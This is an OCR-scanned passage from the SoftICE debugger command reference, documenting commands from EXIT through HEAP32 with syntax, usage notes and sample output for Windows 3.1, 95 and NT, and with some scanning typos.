command (default key F9), an execution breakpoint is set at the location of the 
CUr sor 
position in the Code window. 
Go to cursor line 
Set a temporary breakpoint at the cursor line and begin executing with the HERE 
command (default key F7). 
Scroll the Code window 
The scrolling keys (UpArrow, DownArrow, PageUp and PageDn) are redefined while 
the 
cursor is in the Code window: 
UpArrow: 
DownArrow: 
PageUp: 
PageDn: 


Source Mode Only 

Scroll the Code window from the Command window using the CTRL key with one of 

the 

previously mentioned cursor keys. The following keys also have special meaning: 
CTRL-Home: Moves to line 1 of current source file. 
CTRL-End: Moves to the last line of the current source file. 

Note: The previous keys only work for source display, not for disassembled 

instructions. 
CTRL-RightArrow: Horizontal scroll of source code right. 
CTRL-LeftArrow: Horizontal scroll of source code left. 


(EXIT. 
AEXIT Windows 3.1 FlowControl 
AForce an exit of the current DOS or Windows program. 


%Syntax 
EXIT 


%Use 

The EXIT command attempts to abort the current DOS or Windows program by 
forcing a 

DOS exit function (INT 21h, function 4Ch). This command only works if DOS is in 
a state 

where it is able to accept the exit function call. If this call is made from 
certain interrupt 

routines, or other times when DOS is not ready, the system may behave 
unpredictably. Only 

use this call when SoftICE pops up in VM mode or 16- or 32-bit protected mode 
running at 

ring 3. In 32-bit, ring 0 protected mode code, an error displays. 


%Caution 
Use the EXIT command with care. Because SoftICE can be popped up at any time, a 
situation can occur where DOS is not in a state to accept an exit function 
call. Also, the EXIT 
command does not have any program-specific resetting. 
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Example: The EXIT command does not reset the video mode or interrupt vectors. 
For 

Windows programs, the EXIT command does not free resources. 

If running under WIN32s, the EXIT command sometimes causes WIN32s to pop up 
with an 

unhandled exception occurred dialog box. Press OK to terminate the application. 


For Windows 95 and Windows NT 
EXIT is no longer supported. 


%Example 
Causes the current DOS or Windows program to exit. 
EXIT 


EXP. 
AEXP Windows 3.1, Windows 95, Windows NT Symbol/Source 
ADisplay export symbols from DLLs. 


%Syntax 
EXP [[module!][partial-name]] | [!] 


module! Display exports from the specified module only. 

partial-name Export symbol or the first few characters of the name of an export 
symbol name. The ? character can be used as a wildcard character in 

place of any character in the export name. 

! Display list of modules for which SoftICE has exports loaded. 


%Use 

Use the EXP command to show exports from Windows DLLs, Windows NT drivers, and 
16- 

bit drivers (.DRV extension) for which SoftICE has exports loaded. To tell 
SoftICE which 

DLLs and drivers to load, set the SoftICE initialization settings for Exports 
in Symbol Loader. 

The module and name parameters can be used to selectively display exports only 
from the 

specified module, and/or exports that match the characters and wildcards in the 
name 

parameter. when exports are displayed, the module name is printed first on a 
line by itself, 

and the export names are printed below it, along with their addresses. 


Note: Since DLLs and drivers run in protected mode, the addresses are protected 
mode 
addresses. 


This command is valid for both 16-bit and 32-bit DLLs with 16-bit exports being 
listed first. 
For Windows 3.1 


SoftICE automatically loads exports for KERNEL, USER, and GDI. 


For Windows 95 

SoftICE automatically loads exports for KERNEL, USER, and GDI. The SoftICE 
Loader can 

dynamically load 32-bit exported symbols. 


Windows NT 

SoftICE automatically loads exports for KERNEL32, USER32, and GDI32. The 
SoftICE 

loader can dynamically load 32-bit exported symbols. 
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%Example 

The following example of the EXP command being used to display all exports that 
begin with 

the string DELETE: The output shows that KERNEL.DLL has 3 exports matching the 

string: DELETEATOM, DELETEFILE, and DELETEPATHNAME. These routines are 

located at 127:E3, 11F:7D4 and 127:345A, respectively. Following the exports 
from 

KERNEL are the exports from USER and GDI, and following these begin the 32-bit 
exports. 

. EXP delete 

KERNEL 

0127:00E3 DELETEATOM 011F:07D4 DELETEFILE 

0127:345A DELETEPATHNAME 

USER 

176F:0C88 DELETEMENU 

GDI 

0527:0000 DELETEMETAFILE 04B7:211C DELETESPOOLPAGE 

047F:55FD DELETEDC 054F:0192 DELETEPQ 

047F:564B DELETEOBJECT 04B7:226E DELETEJOB 

0587:A22E DELETEENHMETAFILE 

KERNEL32 

0137:BFF97E9B DeleteAtom 0137:BFF88636 DeleteCriticalSection 

0137:BFF9DC5A DeleteFileA 0137:BFFA4C49 DeleteFileW 

USER32 

0137:BFF62228 DeleteMenu 

GDI32 

0137:BFF3248F DeleteColorSpace 0137:BFF32497 DeleteDC 

0137:BFF3248B DeleteEnhMetaFile 0137:BFF31111 DeleteMetaFile 

0137:BFF3249F DeleteObject 


In the following example, the ! character is used to narrow ExP's output to 
only those 

modules which are listed to the left of the !. In the case where no DLL or 
driver is specified 

before the !, SoftICE simply dumps the names of all the modules for which it 
has exports 

loaded. 

. EXP! 

KERNEL 

USER 

GDI 

KERNEL32 

USER32 

GDI32 


The next example is of the EXP command being used to list all exports within 
USER32.DLL 

that start with © IS.'' The ! character is used here to differentiate the 
module name from the 

name qualifier. 

. EXP user32!is 

USER32 

0137:BFF64290 IsCharAlphaA 

0137:BFF64256 IsCharAlphaNumericA 

0137:BFF61014 IsCharAlphaNumericW 

0137:BFF61014 IsCharAlphaW 

0137:BFF641E8 IsCharLowerA 

0137:BFF61014 IsCharLowerW 

0137:BFF64222 IsCharUpperA 

0137:BFF61014 IsCharUpperW 

0137:BFF61F6A IsChild 

0137:BFF6480F IsClipboardFormatAvailable 

0137:BFF64D7C IsbialogMessage 
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0137:BFF64D7C IsDialogMessageA 
0137:BFF6101D IsbialogMessageW 
0137:BFF618A4 IsDblgButtonChecked 
0137:BFF62F12 IsHungThread 
0137:BFF64697 IsIconic 
0137:BFF623A5 IsMenu 
0137:BFF649B9 IsRectEmpty 
0137:BFF644BF IsWindow 
0137:BFF646E1 IsWindowEnabled 
0137:BFF638C4 IsWindowUnicode 
0137:BFF64706 IsWindowVisible 
0137:BFF646BC IsZoomed 

See Also SYMBOL, TABLE 


:F 
AF Windows 3.1, Windows 95, Windows NT Miscellaneous 
AFill memory with data. 


%Syntax 
F address l length data-list 


length Length in bytes. 
data-list List of bytes or quoted strings separated by commas or spaces. A 
quoted string can be enclosed with single quotes or double quotes. 


%Use 

Memory is filled with the series of bytes or characters specified in the data- 
list. Memory is 

filled starting at the specified address and continues for the specified 
length. If the data-list 

length is less than the specified length, the data-list is repeated as many 
times as necessary. 


%Example 

Fills memory starting at location DS:8000h for a length of 100h bytes with the 
string 'Test'. 

The string 'Test' is repeated until the fill length is exhausted. 

F ds:8000 l 100 'test' 


: FAULTS 
AFAULTS Windows 3.1, Windows 95, Windows NT ModeControl 
ATurn fault trapping on or off. 


%Syntax 
FAULTS [on | off] 


%Use 
Use the FAULTS command to turn SoftICE processor fault trapping on or off. 


%Example 
Turns off fault trapping in SoftICcE. 
FAULTS off 


:FIBER 
AFIBER Windows NT SystemInformation 
ADump a fiber data structure. 


%Syntax 
FIBER [address] 


%Use 
Use the FIBER command to dump a fiber data structure returned by CreateFiber(). 
If you do 
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not specify an address, FIBER dumps the fiber data associated with the current 
thread. 
SoftICE provides a stack trace after the dump. 


%Example 
The following example dumps the fiber data associated with the current thread: 
.:FIBER 


Fiber state for the current thread: 

User data:004565DO SEH Ptr:01C2FFA8 

Stack top:01C30000 Stack bottom:01C2F000 Stack limit :01B30000 
EBX=00000001 ESI=005862B8 EDI=004565DO EBP=01C2FF88 ESP=01C2FC4C 
EIP=63011BAF a.k.a. WININET!.text+00010BAF 

=> at 001B:00579720 


:FILE 
AFILE Windows 3.1, Windows 95, Windows NT Symbol/Source 
AChange or display the current source file. 


%Syntax 
FILE [[*]file-name] 


%Use 
The FILE command is often useful when setting a breakpoint on a line that has 
no associated 
symbol. Use FILE to bring the desired file into the Code window, use the SS 
command to 
locate the specific line, move the cursor to the specific line, then enter BPX 
or press F9 to set 
the breakpoint. 
. If you specify file-name, that file becomes the current file and the start of 
the file displays 
in the Code window. 
If you do not specify file-name, the name of the current source file, if any, 
displays. 
If you specify the * (asterisk), all files in the current symbol table 
display. 


Only source files that are loaded into memory with Symbol Loader or are pre- 
loaded at 
initialization are available with the FILE command. 


For Windows 95 and Windows NT 

Specifying the FILE file-name command switches address contexts within SoftICE, 
if the 

current symbol table has an associated address context. 


%Example 

If main.c is loaded with the SoftICE Loader, this command displays it in the 
Code window 

starting with line 1. 

FILE main.c 


: FKEY 
AFKEY Windows 3.1, Windows 95, Windows NT Customization 
AShow and edit the function key assignments. 


%Syntax 
FKEY [function-key string] 


function-key 
string Consists of any valid SoftICE commands and the special characters 
caret (A) and semicolon (;). Place a caret (A) at the beginning of a 
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command to make the command invisible. Place a semicolon (;) in the 
string in place of Enter. 


%Use 
Use the FKEY command to assign a string of one or more commands to a function- 
key. If you 


do not specify parameters, the current function-key assignments display. 


Hint: You can also edit function key assignments by modifying the SoftICE 
initialization 

settings for Keyboard Mappings in Symbol Loader. Refer to the Using SoftICE 
manual 

for more information about customizing SoftICcE. 


To unassign a specified function-key, use the FKEY command with the parameters 
function_key_name followed by null_string. 


Use carriage return symbols in a function-key assignment string to assign a 
function-key a 
series of commands. A carriage return is represented by a semi-colon (;). 


If you put a caret © A'' or press Shift-6 in front of a command name, the 
subsequent command 

becomes invisible. The command functions as normal, but all information that 
normally 

displays in the Command window (excluding error messages) is suppressed. The 
invisible 

mode is useful when a command changes information in a window (Code, Register, 
or Data), 

but you do not want to clutter the Command window. 


Key Description 

F1 - F12 Unshifted function key 

SF1 - SF12 Shifted function key 

CF1 - CF12 Control key plus function key 
AF1 - AF12 Alternate key plus function key 


SoftICE implements the function-keys by inserting the entire string into its 
keyboard buffer. 

The function-keys can therefore be used anyplace where a valid command can be 
typed. If 

you want a function key assignment to be in effect every time you use SoftICE, 
pre-initialize 

the keyboard mappings within your SOFTICE configuration settings. Refer to 
Chapter 8, 

° Customizing SoftiIcE'' in the Using SoftICE guide. 


%Example 

This example assigns the toggle Register window command to the F2 function-key. 
The caret 

°©°A'' makes the function invisible, and the semicolon © ;'' ends the function 
with a carriage 

return. After you enter this command, press the F2 key to toggle the Register 
window on or 

off. 

FKEY f2 wr; 

The next example shows that multiple commands can be assigned to a single 
function and 

that partial commands can be assigned for the user to complete. After you enter 
this 

command, pressing the Ctrl F1 key sequence causes the program to execute until 
location 
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CS:8028F000h is reached, displays the stack contents, and starts the U command 
for the user 

to complete. 

FKEY cf1 g cs:8028f000;d ss:esp;u cs:eip+ 


After you enter this example, pressing the F1 key makes the Data window three 
lines long and 

dumps data starting at 100h in the segment currently displayed in the Data 
window. 

FKEY f1 wd 3;d 100; 

The following example toggles the Register window, and creates a Locals window 
of length 8 

and a Code window of length 10. 

FKEY f1 wr;wl 8;wc 10; 


:FOBJ 
AFOBJ Windows NT SystemInformation 
ADisplay information about a file object. 


%Syntax 
FOBJ [fobj-address] 
fobj-address Address of the start of the file object structure to be displayed. 


%Use 

The FOBJ command displays the contents of kernel file objects. The command 
checks for the 

validity of the specified file object by insuring that the device object 
referenced by it is a 

legitimate device object. 


The fields shown by SoftICE are not documented in their entirety here, as 
adequate 

information about them can be found in NTDDK.H in the Windows NT DDK. A few 
fields 

deserve special mention, however, because device driver writers find them 
particularly useful: 

Device0Object 

This field is a pointer to the device object associated with the file 
object. 

Vpb 

This is a pointer to the volume parameter block associated with the 

file object (if any). 

FSContext1 and 

FSContext2 

These are file system driver (FSD) private fields that can serve as keys 
to aid the driver in determining what internal FSD data is associated 
with the object. 


Other fields of interest, whose purpose should be fairly obvious, include the 
access protection 
booleans, the Flags, the FileName and the CurrentByteOffset. 


A%KEXample 

The following example shows the FOBJ command's output: 
.:FOBJ fd877230 

DeviceObject * : FD881570 
Vpb * : 00000000 

FsContext * : FD877188 
FsContext2 * : FD877C48 
SecObjPointer * : FD8771B4 
PrivateCacheMap * : 00000001 
FinalStatus : 00000000 
RelatedFile0bj * : 00000000 
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LockOperation : False 
DeletePending : False 

ReadAccess : True 

WriteAccess : True 

DeleteAccess : False 

SharedRead : True 

Sharedwrite : True 

SharedDelete : False 

Flags : 00040002 FO_SYNCHRONOUS_IO | FO_HANDLE_ CREATED 
FileName : \G:\SS\data\status.dat 
CurrentByteOffset : 00 

Waiters : 00000000 

Busy : 00000000 

LastLock* : 00000000 

&Lock : FD877294 

&Event : FD8772A4 

ComplContext* : 00000000 


A:FLASH 
AFLASH Windows 3.1, Windows 95, Windows NT WindowControl 
ARestore the Windows screen during P and T commands. 


%Syntax 
FLASH [on | off] 


%Use 

Use the FLASH command to specify whether the Windows screen restores during any 
T 

(trace) and P (step over) commands. If you specify that the Windows screen is 
to be restored, 

it is restored for the brief time period that the P or T command is executing. 
This feature is 

needed to debug sections of code that access video memory directly. 

If the routine being called writes to the Windows screen and if the P command 
executes across 

a call, the screen restores. when debugging protected mode applications such as 
VxDs or 

Windows applications with FLASH off, this is generally not the case. SoftICE 
restores the 

screen only if the display driver is called before the call is completed. 


If you do not specify a parameter, the current state of FLASH displays. 
The default is FLASH OFF. 


%Example 

This command turns on FLASH mode. The Windows screen restores during any 
subsequent 

P or T commands. 

FLASH on 


: FORMAT 

AFORMAT WINDOWS 3.1, WINDOWS 95, WINDOWS NT WINDOWCONTROL 
AShift-F3 

AChange the format of the Data window. 


%Syntax 
FORMAT 


%Use 


Use the FORMAT command to change the display format in the currently displayed 
Data 
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window. Change the formats in the order byte, word, dword, short real, long 
real, 10-byte 

real, and then starting back at byte. This command is most useful when assigned 
to a function 

key. The default function key assignment is Shift-F3. The Shift-F3 is also 
supported when 

editing in the Data window. 


%Example 
Changes the Data window to the next data format. 
FORMAT 


:G 
AG Windows 3.1, Windows 95, Windows NT FlowControl 
AGo to an address. 


%Syntax 
G [=start-address] [break-address] 


=start-address Any expression that resolves to a valid address is acceptable. 
break-address Any expression that resolves to a valid address is acceptable. 


%Use 

The G command exits from SoftICE. If you specify break-address, a single one- 
time 

execution breakpoint is set on that address. In addition, all sticky 
breakpoints are armed. 

Execution begins at the current CS:EIP unless you supply the start-address 
parameter. If you 

supply the start-address parameter, execution begins at start-address. 
Execution continues 

until the break-address is encountered, the SoftICE pop-up key sequence is 
used, or a sticky 

breakpoint is triggered. When SoftICE pops up, for any reason, the one-time 
execution 

breakpoint is cleared. 


The break-address must be the first byte of an instruction opcode. 
The G command without parameters behaves the same as the X command. 


If the Register window is visible when SoftICE pops up, all registers that have 
been altered 
since the G command was issued are displayed with the bold video attribute. 


For Windows 3.1 
The non-sticky execution breakpoint uses an INT 3 style breakpoint. 


For Windows 95 and Windows NT 

The non-sticky execution breakpoint uses debug registers unless none are 
available. If none 

are available, it uses INT 3. 


%Example 
This command sets a one-time breakpoint at address CS:80123456h. 
G 80123456 


:GDT. 
AGDT Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the Global Descriptor Table. 
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%Syntax 
GDT [selector] 


selector Starting GDT selector to display 


%Use 

The GDT command displays the contents of the Global Descriptor Table. If you 
specify an 

optional selector, only information on that selector is listed. If the 
specified selector is an LDT 

selector (bit 2 is a 1), SoftICE automatically displays information from the 
LDT, rather than 

the GDT. 


%Output 

The base linear address and limit of the GDT is shown at the top of the GDT 
command's 

output. Each subsequent line of the output contains the following information: 

selector value Lower two bits of this value reflects the descriptor privilege 
level. 

selector type One of the following: 


Type Description 

Code16 16-bit code selector 

Data16 16-bit data selector 

Code32 32-bit code selector 

Data32 32-bit data selector 

LDT Local Descriptor Table selector 
TSS32 32-bit Task State Segment selector 
TSS16 16-bit Task State Segment selector 
Call632 32-bit Call Gate selector 
Call616 16-bit Call Gate selector 
Task632 32-bit Task Gate selector 
TaskG616 16-bit Task Gate selector 
Trap632 32-bit Trap Gate selector 


selector base Linear base address of the selector. 

selector limit Size of selector's segment. 

selector DPL Selector's descriptor privilege level (DPL), which is either 0, 1, 
2 or 3. 

present bit P or NP, indicating whether the selector is present or not present. 

segment attributes One of the following: 


%Example 
The following command shows abbreviated output from the GDT command. 
.:GDT 
Sel. Type Base Limit DPL Attributes 
GDTbase=C1398000 Limit=0FFF 
0008 Code16 00017370 0000FFFF 0 P RE 
0010 Data16 00017370 0000FFFF 0 P RW 
0018 TSS32 COOOAEBC 00002069 0 P B 


0020 Data16 C1398000 00000FFF 0 P_RW 
0028 Code32 00000000 FFFFFFFF 0 P RE 
0030 Data32 00000000 FFFFFFFF O P RW 
003B Code16 C33E9800 000007FF 3 P RE 
0043 Data16 00000400 000002FF 3 P_ RW 
0048 Code16 00013B10 0000FFFF 0 P_RE 
0050 Data16 00013B10 0000FFFF 0 P_RW 
0058 Reserved 00000000 0000FFFF 0 NP 
0060 Reserved 00000000 0000FFFF 0 NP 


0068 TSS32 C0015DE8 00000068 0 P 
Trap616 16-bit Trap Gate selector 
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Int632 32-bit Interrupt Gate selector 
Int616 16-bit Interrupt Gate selector 
Reserved Reserved selector 


Value Description 

RW Data selector is readable and writable. 
RO Data selector is read only. 

RE Code selector is readable and executable. 
EO Code selector is execute only. 

B Tss's busy bit is set. 

ED Expand down data selector. 

Type Description 

:GENINT 


AGENINT Windows 3.1, Windows 95, Windows NT FlowControl 
AForce an interrupt to occur. 


%Syntax 
GENINT [nmi | int1 | int3 | interrupt-number] 


interrupt-number For Windows 3.1 and Windows 95: Valid interrupt number between 
® and 5Fh. 


For Windows NT: Valid interrupt number between 0 and FFh. 


%Use 

The GENINT command forces an interrupt to occur. Use this function to hand off 
control to 

another debugger you are using with SoftICE. Also use it to test interrupt 
routines. 

The GENINT command simulates the processing sequence of a hardware interrupt or 
an 

INT instruction. It vectors control through the current IDT entry for the 
specified interrupt 

number. 


Warning: Ensure that there is a valid interrupt handler before using this 
command. SoftICE 

does not know if there is a handler installed. Your machine will most likely 
crash if 

there is not one. 


GENINT cannot be used to simulate a processor fault that pushes an exception 
code. For 
example, GENINT cannot simulate a general protection fault. 


%Example 

The following command forces a non-maskable interrupt. It gives control back to 
CodeView 

for DOS, if you use SoftICE as an assistant to CodeView for DOS. 

GENINT nmi 


If using CodeView for Windows, use the command: 
GENINT © 


For other debuggers, experiment with interrupt-numbers 0, 1, 2 and 3. 


When the command I3HERE==ON, and you are using a level -3 debugger, such as 
BoundsChecker, SoftICE traps on any INT 3 breakpoints installed by the level-3 
debugger. 

when this happens, set ISHERE==0FF, and use the GENINT command to reactivate 
the 
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breakpoint. This returns control to the level -3 debugger, and SoftICE does not 
trap 

subsequent INT 3s. 

ISHERE off 

GENINT 3 


:H 

AH WINDOWS 3.1, WINDOWS 95, WINDOWS NT MISCELLANEOUS 
AFI1 

ADisplay help information. 


%Syntax 
For Windows 3.1 
H [command | expression] 


For Windows 95 and Windows NT 
H [command] 


%Use For Windows 3.1 

Under Windows 3.1, the parameter you supply determines whether help is 
displayed or an 

expression is evaluated. If you specify a command, help displays detailed 
information about 

the command, including the command syntax and an example. If you specify an 
expression, 

the expression is evaluated, and the result is displayed in hexadecimal, 
decimal, signed decimal 

(only if < 0), and ASCII. 


For Windows 95 and Windows NT 

Under Windows 95 and Windows NT, the H command displays help on SoftICE 
commands. (Refer to ? on page 3 for information about evaluating expressions 
under 

Windows 95 and Windows NT.) To display general help on all the SoftICE 
commands, enter 

the H command with no parameters. To see detailed information about a specific 
command, 

use the H command followed by the name of the command on which you want help. 
Help 

displays a description of the command, the command syntax, and an example. 


%Example 

The following example displays information about the ALTKEY command: 
.:H altkey 

Set key sequence to invoke window 

ALTKEY [ALT letter | CTRL letter] 

ex: ALTKEY ALT D 


: HBOOT 
AHBOOT Windows 3.1, Windows 95, Windows NT FlowControl 
ADo a hard system boot (total reset). 


%Syntax 
HBOOT 


%Use 

The HBOOT command resets the computer system. SoftICE is not retained in the 
reset 

process. HBOOT is sufficient unless an adapter card requires a power-on reset. 
In those rare 

cases, the machine power must be recycled. 
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HBOOT performs the same level of system reset as pressing Ctrl-Alt-Delete when 
not in 
SoftICE. 


%Example 
To make the system reboot, use this command: 
HBOOT 


: HEAP 
AHEAP Windows 3.1, Windows 95, Windows NT SystemInformation 
ADisplay the Windows global heap. 


%Syntax 
HEAP -L [free | module-name | selector] 


-L Display only global heap entries that contain a local heap. 
module-name Name of the module. 
selector LDT selector. 


%Use 

For Windows 95 

For 16-bit modules, the HEAP command works the same as it does under Windows 
3.1. 


For Windows NT 

For 16-bit modules, the HEAP command works the same as it does under Windows 
3.1, but 

is process-specific. You must be in a NTVDM process that contains a WOW 
(Windows on Windows) box. 


For Windows 3.1 
The HEAP command displays the Windows global heap in the Command window. 
If you do not specify parameters, the entire global heap displays. 
If you specify FREE, only heap entries marked as FREE display. 
If you specify the module name, only heap entries belonging to the module 
display. 
If you specify an LDT selector, only a single heap entry corresponding to the 
selector displays. 


At the end of the listing, the total amount of memory used by the heap entries 
that displayed 

is shown. If the current CS:EIP belongs to one of the heap entries, that entry 
displays with the 

bold video attribute. 


If there is no current LDT, the HEAP command is unable to display heap 
information. 


%Output 
For each heap entry the following information displays: 
selector or handle In Windows 3.1, this is almost the same thing. Heap 
selectors all have 
a dpl of 3 while the corresponding handle is the same selector with a 
dpl of 2. For example, if the handle was 106h the selector would be 
107h. Use either of these in an expression. 
address 32-bit flat virtual address. 
size Size of the heap entry in bytes. 
module name Module name of the owner of the heap entry. 
type Type of entry. One of the following: 


Additional Type Information 
If the heap entry is a code or a data segment, the segment number 
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from the .EXE file displays. If the heap entry is a resource, one of the 
following resource types may display: 
Type Description 

Code Non-discardable code segment 

Code D Discardable code segment 

Data Data segment 

ModuleDB Module data base segment 

TaskDB Task data base segment 

BurgerM Burger Master (The heap itself ) 
Alloc Allocated memory 

Resource Windows Resource 

UserDef Icon String Accel IconGrp 

Cursor Menu FontGrp ErrTable NameTabl 
Bitmap Dialog Font CursGrp 


%Example 

To display all heap entries belonging to the KERNEL module, use the following 
command: 

HEAP kernel 


Han/Sel Address Length Owner Type Seg/Rsr 
00F5 000311C0 000004C0 KERNEL ModuleDB 
00FD 00031680 00007600 KERNEL Code 01 
0575 00054220 00003640 KERNEL Alloc 

0106 00083E40 00002660 KERNEL Code D 02 
010E 805089A0 00001300 KERNEL Code D 03 
0096 80520440 00000C20 KERNEL Alloc 
Total Memory :62K 


: HEAP32 
AHEAP32 Windows 95 SystemInformation 
ADisplay the Windows global heap. 


%Syntax 
HEAP32 [hheap32 | task-name]] 


hheap32 Heap handle returned from HeapCreate. 
task-name Name of any 32-bit task. 


%Use 
For Windows 95 
The HEAP32 command displays heaps for a process. 


Note: For 16-bit modules, use the HEAP32 on page 100. 


The HEAP32 command displays the following: 
KERNEL32 default system heap. 
Private heaps of processes created through the HeapCreate( ) function. 
. Two Ring-0 heaps created by VMM. The first one displayed is the pagelocked 
heap, and 
the second is the pagetable heap. 
One Ring-0 heap for every existing virtual machine. 


If you provide a process name, SoftICE displays the entire default process heap 
for that 

process, and the address context automatically changes to that of the process. 
To view a 

nondefault heap for a process, specify the heap base address instead of the 
process name. 

The debug versions of Windows 95 provide extra debugging information for each 
heap 
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element within a heap. To see this information, you must be running the 
appropriate debug 
version, as follows: 

For KERNEL32 Ring-3 heaps, have the SDK debug version installed. 

For VMM Ring-0 heaps, have the DDK debug version of VMM installed. 


%Output 
For each heap entry, the following information displays: 
HeapBase Address where the heap begins. 


MaxSize 

Current maximum size the heap can grow without creating a new 
segment. 

Committed 

Number of kilobytes of committed memory that are currently present 
in physical memory. 

Segments 

Number of segments in the heap. Each time the heap grows past the 
current maximum size, a new heap segment is created. 

Type 

Owner 

Name of the process that owns the heap. 


When displaying an individual 32-bit heap, the following information displays: 
With the appropriate debug versions of the SDK and DDK, the following extra 
information 

appears for each heap element: 


Heap Type Description 

Private Ring 3 heap created by an application process. 
System Ring 3 default heap for KERNEL32. 

Ringo Ring 0 heap created by VMM. 

VMH# Heap created by VMM for a specific Virtual 


Machine to hold data structures specific to that VM. 


Address 

Address of the heap element 

Size 

Size in bytes of the heap element 
Free 


If the heap element is a free block, the word FREE 
appears; otherwise, the field is blank. 

Heap 

Element Description 

EIP 

EIP address of the code that allocated the heap 
element. 

TID 

VMM thread-id of the allocating thread 

Owner 

Nearest symbol to the EIP address 


%Example 
To display all 32-bit heaps, use the command: 
HEAP32 


To display all heap entries for Exchng32, use the command: 
HEAP32 exchng32 


HeapBase Max Size Commit- 
ted 
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Seg- 

ments 

Type Owner 

00EA0000 1024K 8K 1 Private Mapisp32 
00DA0000 1024K 8K 1 Private Mapisp32 
00CA0000 1024K 8K 1 Private Mapisp32 
00960000 1024K 8K 1 Private Mapisp32 
00860000 1024K 8K 1 Private Mapisp32 
Heap: 00400000 Max Size: 1028K Committed: 12K Segments: 1 
Address Size 

00400078 000004E4 

00400560 00000098 

004005FC 00000054 

00400654 000000A4 

004006FC 00000010 

00400710 00000014 Free 


:HEAP32 (NT) 
AHEAP32 Windows NT SystemInformation 
ADisplay the Windows heap. 


%Syntax 
HEAP32 [[-w -x -s -v -b -trace] [heap | heap-entry | process-type]] 


-w Walk the heap, showing information about each heap entry. 

-xX Show an extended summary of a 32-bit heap. 

-s Provide a segment summary for a heap. 

-v Validate a heap or heap-entry. 

-b Show base address and sizes of heap entry headers. 

-trace Display a heap trace buffer. 

heap 32-bit heap handle. 

heap-entry Heap allocated block returned by HeapAlloc or HeapRealloc. 
process-type Process name, process-id, or process handle (KPEB). 


%Use 

All HEAP32 options and parameters are optional. If you do not specify options 
Or 

parameters, a basic heap summary displays for every heap in every process. If a 
parameter is 

specified without options, a summary will be performed for the heap-entry, 
heap, or in the 

case of a process-type, a summary for each heap within the process. 


Note: All 16-bit HEAP functionality still works. Refer to HEAP on page 94 for 
Windows 
3.1. This information only applies to HEAP32. 


The -Walk option walks a heap, showing the state of each heap-entry on a heap. 
The Walk 

option is the default option if you specify a heap handle without other 
options. 

The -eXtended option displays a detailed description of all useful information 
about a heap, 

including a segment summary and a list of any Virtually Allocated Blocks (VABS) 
or extra 

UnCommitted Range (UCR) tables that may have been created for the heap. 


The -Segment option displays a simple summary for the heap, and each of its 
heap-segments. 

Segments are created to map the linear address space for a region of a heap. A 
heap can be 

composed of up to sixteen segments. 
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The -Validate option is an extremely powerful option, as it completely 
validates a single heap- 
entry, or a heap and all of its components, including segments, heap-entries, 
and VABs. In 
most cases, the heap validation is equivalent to or stricter than the Win32 API 
Heap 
functions. The -Validate option is the only option that takes a heap-entry 
parameter as input. 
All other options work with heap handles or process-types. If the heap is 
valid, an appropriate 
message displays. If the validation fails, one of the following error messages 
appears: 
. For a block whose header is corrupt: 
Generic Error: 00140BDO is not a heap entry, or it is corrupt 
Specific Error: 00140BDO: Backward link for Block is invalid 
. For a block whose guard-bytes have been overwritten: 
Allocated block: 00140BDO: Block BUSY TAIL is corrupt 
Note: If you run your application under a debugger, for example, 
BoundsChecker or 
Visual C++, each allocated block has guard-bytes, and each free block is 
marked 
with a pattern so that random overwrites can be detected. 
For a free block that has been written to, subsequent to being freed: 
Free block: 00140E50: Free block failed FREE CHECK at 141E70 


Use the -Base option to change the mode in which addresses and heap entry sizes 
display. 

Under normal operation, all output shows the address of the heap-entry data, 
and the size of 

the user data for that block. When you specify the -Base option, all output 
shows the address 

of the heap-entry header, which precedes each heap-entry, and the size of the 
full heap-entry, 

including the heap-entry header and any extra data allocated for guard-bytes, 
or to satisfy 

alignment requirements. Under most circumstances you will not want to specify 
base 

addressing unless you are trying to walk a heap or its entries manually. 


When you use the -Base option, the base address for each heap-entry is 8 bytes 
less than when 

-Base is not specified. This happens because the heap-entry header precedes the 
actual heap- 

entry by 8 bytes. Secondly, the size for the allocated blocks is larger because 
of the additional 8 

bytes for the heap-entry header, guard-bytes, and, if necessary, any extra 
bytes needed for 

proper alignment. The output from the -Base option is useful for manually 
navigating 

between adjacent heap entries, or checking for memory overruns between the end 
of the heap- 

entry data and any unused space prior to the guard-bytes, which are always 
allocated as the 

last two DWORDs of the heap entry. 


Note: The -Base option has no effect on input parameters. Heap-entry addresses 
are always 
assumed to be the address of the heap-entry data. 


Use the -TRACE option to display the contexts of a heap trace buffer which 
record actions 
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that occur within a heap. Heap trace buffers are optional and are generally not 
created. To 

enable tracing in the Win32 API, specify the HEAP_CREATE_ENABLE_TRACING flag as 
one of the flags to ntdll!RtlCreateHeap. You cannot use this option with 
Kernel32!HeapCreate( ) because it strips out all debug-flags before calling 
ntdll!Rt1lCreateHeap. You must also be running the application under a level-3 
debugger, for 

example, BoundsChecker or the Visual C++ debugger, so that the Win32 heap 
debugging 

options will be enabled. 


Any time a process-type is passed as a parameter, any and all options are 
performed for each 
heap within the process. 


The HEAP32 command and all of its options work on either a single specified 
heap handle or 
ALL the heaps for an entire process. 


%Example: This command performs a heap validation for all the heaps in the 
Test32 process: 
HEAP 32 -v test32 


when using bare addresses, for example, 0x140000, the current context is 
assumed.%Use the 
ADDR command to change to the appropriate context. 


For Not Present Memory, due to the nature of operating systems that use paging 
to 

implement virtual memory, in some cases, the actual physical memory that backs 
a particular 

linear address will not be present in memory. To be useful within this 
restriction, the HEAP32 

command detects, avoids, and, where possible, continues to operate without the 
need for not 

present pages. In all cases where not present memory prevents the HEAP32 
command from 

performing its work, you are notified of that condition. When possible the 
HEAP32 

command skips not present pages and continues processing at a point where 
physical memory 

is present. Because not present memory prevents the HEAP32 command from 
performing a 

full validation of a heap, the validation routines indicate success, but let 
you know that only a 

partial validation could be performed. 


%Output 
Base 
Base address of the heap, that is, the heap handle. 
Id Heap ID. 
Cmmt/Psnt/Rsvd Amount of committed, present, and reserved memory used for heap 
entries. 


Segments 

Number of heap segments within the heap. 

Flags 

Heap flags, for example, HEAP_GROWABLE (0x02). 
Process 


Process that owns the heap. 

If you specify the -W switch, the following information displays: 
Base 

This is the address of the heap entry. 
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Type Type of the heap entry. 
Size Size of the heap-entry. Typically, this is the number of bytes 
available 
to the application for data storage. 
Seg# Heap segment in which the heap-entry is allocated. 
Flags Heap entry flags. 
If you specify the -S switch, the following additional information displays: 
Seg# Segment number of the heap segment. 
Segment Range Linear address range that this segment maps to. 
Cmmt/Psnt/Rsvd Amount of committed, present, and reserved memory for 
this heap 
segment. 
Max UCR Maximum uncommitted range of linear memory. This value specifies 
the largest block that can be created within this heap segment. 


Heap Entry Description 

HEAP Represents the heap header. 
